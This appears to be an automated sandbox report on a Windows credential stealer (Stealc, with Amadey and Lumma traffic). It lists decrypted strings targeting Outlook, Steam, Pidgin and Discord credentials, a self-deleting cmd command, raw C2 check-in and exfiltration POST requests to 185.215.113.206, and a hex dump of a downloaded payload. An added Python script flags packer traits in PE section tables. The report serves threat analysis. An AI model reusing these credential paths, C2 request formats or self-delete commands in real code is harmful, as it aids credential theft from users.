Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 00000001
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 00000002
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 00000003
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 00000004
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Pidgin
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \.purple\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: token:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SteamPath
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \config\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ssfn*
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: config.vdf
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \Steam\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: done
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: soft
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: https
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: POST
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: hwid
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: build
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: token
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: file_name
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: file
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: message
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: screenshot.jpg
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6CBBA9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB44C0 PK11_PubEncrypt, 0_2_6CBB44C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6CB84420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB4440 PK11_PrivDecrypt, 0_2_6CBB4440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6CC025B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6CB9E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB98670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6CB98670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBBA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6CBBA650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6CBDA730
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6CBE0180
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB43B0 PK11_PubEncryptPKCS1,PR_SetError, 0_2_6CBB43B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBD7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 0_2_6CBD7C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 0_2_6CBDBD30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 0_2_6CB97D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 0_2_6CBD9EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB3FF0 PK11_PrivDecryptPKCS1, 0_2_6CBB3FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 0_2_6CBB3850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 0_2_6CBB9840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDDA40 SEC_PKCS7ContentIsEncrypted, 0_2_6CBDDA40
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: chrome.exe Memory has grown: Private usage: 14MB later: 39MB

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49740 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.8:57224 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.8:49743 -> 172.67.165.166:443
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49741
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Dec 2024 19:52:58 GMTContent-Type: application/octet-streamContent-Length: 3221504Last-Modified: Fri, 06 Dec 2024 19:41:03 GMTConnection: keep-aliveETag: "6753534f-312800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Dec 2024 19:54:09 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Fri, 06 Dec 2024 19:40:49 GMTConnection: keep-aliveETag: "67535341-1c6800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 48 97 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 67 73 65 63 79 78 67 00 00 1a 00 00 b0 2f 00 00 f8 19 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 77 69 6a 76 69 66 6c 79 00 10 00 00 00 b0 49 00 00 04 00 00 00 42 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
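The two 200 OK responses above are the payloads fetched from 185.215.113.16 (3221504 and 1861632 bytes, served as application/octet-stream). Reading their headers explains several of the static signatures in this report ("PE file contains section with special chars", "Detected unpacking (changes PE section rights)"): the first section of each file is named with three spaces, a NUL and four more spaces, the second file also has a section named with eight spaces, the bulk of the image sits in randomly named sections (urdywiyw/pwtoxbng, kgsecyxg/wijvifly), almost every section is mapped writable and executable, and AddressOfEntryPoint (0x313000 and 0x49C000) falls in the last section, .taggant (a name borrowed from the IEEE software taggant scheme, whose data block has no reason to be executable). In other words execution starts in a packer stub, not in a normal .text. The script below is an added example, my code rather than anything from Joe Sandbox or the sample, that walks a PE section table and flags exactly these traits. Rather than embedding the raw dumps, it rebuilds a minimal header from the section-table values and entry points transcribed from the two dumps (the builder is my construction); parse_pe() accepts a real file read from disk just the same. As a cross-check, the last section's PointerToRawData plus SizeOfRawData gives 0x312800 = 3221504 and 0x1C6800 = 1861632, matching the two Content-Length headers and the size half of the nginx ETags.

```python
import struct

KNOWN_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                       ".edata", ".pdata", ".bss", ".tls", ".CRT", ".gfids"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section tables transcribed from the two HTTP 200 responses above. Field order
# follows IMAGE_SECTION_HEADER: (Name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, Characteristics). 0xE0000040 = INITIALIZED_DATA|EXECUTE|READ|WRITE.
PAYLOAD1_SECTIONS = [  # 3221504-byte response, AddressOfEntryPoint 0x313000
    (b"   \x00    ", 0x68000, 0x1000, 0x68000, 0x1000, 0xE0000040),
    (b".rsrc", 0x388, 0x69000, 0x400, 0x69000, 0xC0000040),
    (b".idata  ", 0x1000, 0x6A000, 0x200, 0x69400, 0xC0000040),
    (b"urdywiyw", 0x2A7000, 0x6B000, 0x2A6C00, 0x69600, 0xE0000040),
    (b"pwtoxbng", 0x1000, 0x312000, 0x400, 0x310200, 0xE0000040),
    (b".taggant", 0x3000, 0x313000, 0x2200, 0x310600, 0xE0000040),
]
PAYLOAD2_SECTIONS = [  # 1861632-byte response, AddressOfEntryPoint 0x49C000
    (b"   \x00    ", 0x51000, 0x1000, 0x23200, 0x1000, 0xE0000040),
    (b".rsrc", 0x2B0, 0x52000, 0x400, 0x24200, 0xC0000040),
    (b".idata  ", 0x1000, 0x53000, 0x200, 0x24600, 0xC0000040),
    (b"        ", 0x2A7000, 0x54000, 0x200, 0x24800, 0xE0000040),
    (b"kgsecyxg", 0x1A0000, 0x2FB000, 0x19F800, 0x24A00, 0xE0000040),
    (b"wijvifly", 0x1000, 0x49B000, 0x400, 0x1C4200, 0xE0000040),
    (b".taggant", 0x3000, 0x49C000, 0x2200, 0x1C4600, 0xE0000040),
]


def build_pe32_header(sections, entry_point, image_base=0x400000):
    """Constructed minimal PE32 header (no DOS stub, no data directories): not the
    real bytes, just enough structure for parse_pe() to walk."""
    pe_off = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", pe_off)   # e_lfanew at 0x3C
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_point)   # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)    # ImageBase
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vs, va, rs, rp, 0, 0, 0, 0, ch)
        for name, vs, va, rs, rp, ch in sections)
    return dos + coff + bytes(opt) + table


def parse_pe(data):
    """Walk the headers of a PE image: entry point, image base and section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    size_opt = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x20B:   # PE32+: ImageBase is a QWORD and there is no BaseOfData
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsec):
        name, vs, va, rs, rp, _, _, _, _, ch = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + size_opt + 40 * i)
        sections.append({"name": name.split(b"\0", 1)[0].decode("latin-1"),
                         "vsize": vs, "va": va, "raw_size": rs, "raw_ptr": rp, "chars": ch})
    return {"entry_point": entry, "image_base": image_base, "sections": sections}


def assess(data):
    """Flag the section-table traits that make these payloads stand out."""
    pe = parse_pe(data)
    secs = pe["sections"]
    names = [s["name"] for s in secs]
    odd = [n for n in names
           if n not in KNOWN_SECTION_NAMES or any(c.isspace() or not c.isprintable() for c in n)]
    rwx = [s["name"] for s in secs
           if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE]
    ep = pe["entry_point"]
    entry_sec = next((s["name"] for s in secs
                      if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw_size"])), None)
    return {
        "sections": names,
        "odd_names": odd,
        "rwx": rwx,
        "entry_section": entry_sec,
        "entry_in_last_section": bool(secs) and entry_sec == names[-1],
        # highest raw offset + size: the smallest file that can carry this table
        "declared_size": max((s["raw_ptr"] + s["raw_size"] for s in secs), default=0),
    }


if __name__ == "__main__":
    for label, table, ep in (("payload 1", PAYLOAD1_SECTIONS, 0x313000),
                             ("payload 2", PAYLOAD2_SECTIONS, 0x49C000)):
        print(label, assess(build_pe32_header(table, ep)))
```

Running it on a real sample only needs `assess(open(path, "rb").read())`; the `declared_size` check is a cheap way to confirm a download completed (or was truncated) before spending time on it.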
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 42 39 37 33 32 30 44 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="hwid"ECB97320DD0F807656615------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="build"drum------BGDAAEHDHIIJKECBKEBA--
